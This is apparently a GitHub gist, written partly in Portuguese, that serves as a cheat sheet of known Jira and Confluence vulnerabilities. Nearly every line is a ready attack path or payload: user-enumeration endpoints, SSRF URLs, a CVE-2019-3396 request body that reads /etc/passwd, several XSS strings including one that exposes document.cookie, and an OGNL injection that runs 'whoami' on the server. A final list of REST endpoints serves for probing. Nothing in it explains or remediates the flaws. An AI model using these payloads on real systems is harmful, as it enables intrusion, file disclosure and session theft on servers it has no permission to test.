Last active
November 14, 2023 18:15
-
-
Save BigCr0C/4db2a4d2339a2a9ce0eb8c96110393e3 to your computer and use it in GitHub Desktop.
common jira vulnerabilities
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
=== Vulnerabilidades mais comuns no Jira === | |
CVE-2019-8449 Enumeração de usuários: /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
>>==============================<< | |
CVE-2019-8451 SSRF: /plugins/servlet/gadgets/makeRequest?url=https://victimhost:1337@example.com | |
>>==============================<< | |
CVE-2019–11581: RCE: /secure/ContactAdministrators!default.jspa | |
>>==============================<< | |
CVE-2019-3396 RCE: POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: JIRA ... | |
{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler(.)com/v/23464dc5","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}} | |
>>==============================<< | |
CVE-2018-20824 XSS: /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) | |
>>==============================<< | |
CVE-2020-14181 Enumeração de usuários: /ViewUserHover.jspa?username=Admin | |
>>==============================<< | |
CVE-2017-9506 SSRF: /plugins/servlet/oauth/users/icon-uri?consumerUri=http:/example.com | |
>>==============================<< | |
CVE-2019-3403 Divulgação de informações: rest/rest/api/2/user/picker | |
>>==============================<< | |
CVE-2019-8442 diretório META-INF: /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml | |
>>==============================<< | |
CVE-2019-3402 XSS: /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search | |
ConfigurePortalPages.jspa | |
>>==============================<< | |
CVE-2018-20824 XSS: /plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true | |
=== Dashboards e Filtros Populares === | |
Dashboards: /rest/api/2/dashboard?maxResults=100 | |
>>==============================<< | |
Popular Filters: /secure/ManageFilters.jspa?filter=popular&filterView=popular | |
=== XSS === | |
XSS: /pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm | |
>>==============================<< | |
/secure/QueryComponent!Default.jspa (info) | |
/plugins/servlet/oauth/users/icon-uri?consumerUri= (SSRF/OPEN redirect) | |
/cgi-bin/printenv.pl (info) | |
/pages/createpage-entervariables.action?spacekey=x (RCE) | |
/%24%7b%28%23a%3d%40org.apache.commons.io.ioutils%40tostring%28%40java.lang.runtime%40getruntime%28%29.exec%28%22whoami%22%29.getinputstream%28%29%2c%22utf-8%22%29%29.%28%40com.opensymphony.webwork.servletactioncontext%40getresponse%28%29.setheader%28%22x-cmd-response%22%2c%23a%29%29%7d/ (RCE) | |
Endpoints: | |
/rest/api/2/issueLinkType | |
/rest/api/2/priority | |
/rest/api/2/projectCategory | |
/rest/api/2/resolution | |
/rest/api/2/status | |
/rest/api/2/statuscategory | |
/rest/api/2/projectvalidate/key?key= | |
/rest/api/2/jql/autocompletedata/ | |
/rest/api/1.0/issues/14101/ActionsAndOperations | |
/rest/api/2/search | |
/rest/api/latest/avatar/project/system | |
/rest/api/2/user/assignable/multiProjectSearch?query=query&projectKeys= | |
/rest/gadget/1.0/createdVsResolved/generate | |
/rest/config/1.0/directory | |
/rest/menu/latest/appswitcher | |
/rest/menu/latest/admin | |
/rest/menu/latest/home | |
/rest/menu/latest/profile |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment